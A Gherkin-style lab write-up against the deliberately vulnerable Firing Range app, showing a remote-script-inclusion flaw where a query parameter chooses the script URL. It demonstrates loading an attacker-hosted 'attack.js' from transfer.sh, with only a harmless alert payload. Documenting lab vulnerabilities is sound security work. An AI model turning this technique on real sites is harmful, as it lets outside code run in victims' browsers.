# language: en

Feature: JavaScript import from bad sources - from non-registered domain
  From the Firing Range system

  Background:
    Given I'm running macOS High Sierra 10.13.6 (17G65)
    And using Docker version 18.06.0-ce, build 26399
    And also using Safari Version 11.1.2 (13605.3.8)
    And installed firing-range locally
    Given the following scenario
    """
    URL: http://localhost:8080/remoteinclude/parameter/script?q=
    http://g00gle.com/typosquatting_domain.js
    Message: These vulnerabilities import JavaScript from bad sources that are
    not necessarily owned by the page owner
    Details:
      - Script inclusions from locahost Page
      - Message Script inclusions from non-registered domains or typosquatting
        domains, for example http://g00gle.com/typosquatting_domain.js
      - Page in blank and two files loaded.
    Objective: Demostrated the vulnearbility of load files from other site.
    """

    Scenario: load a js File attempt
    Given I checked the source code an found
    """
    <html>
      <head><title>Remote include - URL seeded from query parameter</title>
      </head>
      <body>
        <script src="http://g00gle.com/typosquatting_domain.js"></script>
      </body>
    </html>
    """
    And realized that the js file is called from a g00gle page domain
    When I upload a file to transfer.sh named 'attack.js' with the following
    """
    alert('I\'m a diferent js');
    """
    Then open the page url of firing range with the vulnerability
    And changed the 'q' parameter to other js on a transfer.sh by the following
    """
    q=https://transfer.sh/OLRAE/attack.js
    """
    And after I reloaded the page with the new parameter the alert popup
